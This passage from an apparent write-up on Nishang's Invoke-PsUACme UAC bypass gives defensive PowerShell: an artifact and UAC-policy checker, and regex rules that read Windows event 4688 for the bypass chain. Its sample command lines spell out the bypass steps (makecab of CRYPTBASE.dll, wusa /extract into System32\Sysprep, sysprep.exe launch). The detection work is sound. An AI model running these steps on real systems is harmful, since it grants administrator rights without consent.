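        (Join-Path $SystemRoot 'Temp\cmd.bat'),
        (Join-Path $TempDir 'uac.cab'),
        (Join-Path $TempDir 'uac_winsat.cab'),
        (Join-Path $TempDir 'winsat.exe')
    )

    $findings = @()
    foreach ($dir in $planted.Keys) {
        foreach ($name in $planted[$dir]) {
            $path = Join-Path $dir $name
            if (-not (Test-Path -LiteralPath $path)) { continue }
            # A legitimately shipped copy carries a valid Microsoft signature;
            # the modified Fubuki DLL the script drops is unsigned.
            $sig    = Get-AuthenticodeSignature -FilePath $path
            $signer = $null
            if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
            $findings += [pscustomobject]@{
                Path    = $path
                Status  = $sig.Status
                Signer  = $signer
                Written = (Get-Item -LiteralPath $path).LastWriteTime
            }
        }
    }
    foreach ($path in $staged) {
        if (Test-Path -LiteralPath $path) {
            $findings += [pscustomobject]@{
                Path = $path; Status = 'StagingFile'; Signer = $null
                Written = (Get-Item -LiteralPath $path).LastWriteTime
            }
        }
    }

    # UAC policy: wusa.exe only auto-elevates below "Always notify"
    # (ConsentPromptBehaviorAdmin = 2), so that setting stops this whole class of bypass.
    $uac = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        UacEnabled                 = [bool]$uac.EnableLUA
        ConsentPromptBehaviorAdmin = $uac.ConsentPromptBehaviorAdmin
        AutoElevationBlocked       = ($uac.ConsentPromptBehaviorAdmin -eq 2)
        Findings                   = $findings
    }
}

# Run and print: any finding whose Status is not Valid deserves a closer look.
$report = Find-PsUACmeArtifacts
$report | Select-Object UacEnabled, ConsentPromptBehaviorAdmin, AutoElevationBlocked
$report.Findings | Format-Table -AutoSize
```

Reading the Security policy key and the protected directories needs an elevated prompt on a hardened host; the function reports, it never deletes.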
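A second added example, again not part of Nishang: detection logic for the three-step chain every switch case above performs (makecab packs a DLL in %temp%, wusa.exe extracts the cab into %SystemRoot%, an auto-elevating binary is launched), run over constructed process command lines and, optionally, over Security event 4688. The function names and sample lines are assumptions; live use requires "Audit Process Creation" with command line logging enabled.

```powershell
# Added example (not part of Nishang): flag process-creation command lines that match
# the makecab -> wusa /extract -> auto-elevated binary sequence used by Invoke-PsUACme.
function Test-WusaExtractAbuse {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string[]]$CommandLine
    )
    begin {
        # Step 1: makecab packs a DLL staged in a user-writable temp directory.
        $stage   = '\bmakecab(\.exe)?\b.*\\temp\\[^\s"]+\.dll\b'
        # Step 2: wusa.exe (auto-elevated) extracts a cab into %SystemRoot%, where a
        # medium integrity process could not write directly. -match is case-insensitive.
        $extract = '\bwusa(\.exe)?\b.*\.cab\b.*/extract:"?[a-z]:\\windows\\'
        # Step 3: one of the binaries the script launches after planting its DLL.
        $launch  = '\\System32\\(Sysprep\\sysprep\.exe|oobe\\setupsqm\.exe|migwiz\\migwiz\.exe|cliconfg\.exe|Sysprep\\winsat\.exe|mmc\.exe\s+eventvwr\.msc)'
    }
    process {
        foreach ($line in $CommandLine) {
            $reason = $null
            if     ($line -match $extract) { $reason = 'wusa /extract into SystemRoot' }
            elseif ($line -match $stage)   { $reason = 'makecab of a DLL from temp' }
            elseif ($line -match $launch)  { $reason = 'auto-elevating binary from bypass list' }
            if ($reason) {
                [pscustomobject]@{ Reason = $reason; CommandLine = $line }
            }
        }
    }
}

function Get-WusaExtractEvents {
    # Reads Security event 4688; needs "Audit Process Creation" plus
    # "Include command line in process creation events", and an elevated reader.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents |
        ForEach-Object { $_.Properties[8].Value } |   # index 8 is the CommandLine field of 4688
        Test-WusaExtractAbuse
}

# Constructed sample command lines: the first three mirror the sysprep method of the
# script above; the last two are benign uses of the same binaries and must stay silent.
$sample = @(
    'makecab C:\Users\alice\AppData\Local\Temp\CRYPTBASE.dll C:\Users\alice\AppData\Local\Temp\uac.cab',
    'wusa C:\Users\alice\AppData\Local\Temp\uac.cab /extract:C:\Windows\System32\Sysprep\',
    'C:\Windows\System32\Sysprep\sysprep.exe',
    'wusa.exe C:\Users\alice\Downloads\update.msu /quiet /norestart',
    'makecab /F C:\build\package.ddf'
)
$sample | Test-WusaExtractAbuse | Format-Table -AutoSize   # three hits, two silent
```

On a monitored host replace the sample with `Get-WusaExtractEvents`; a single hit on the wusa /extract rule is already worth triage, since legitimate update installs never extract into System32 subdirectories.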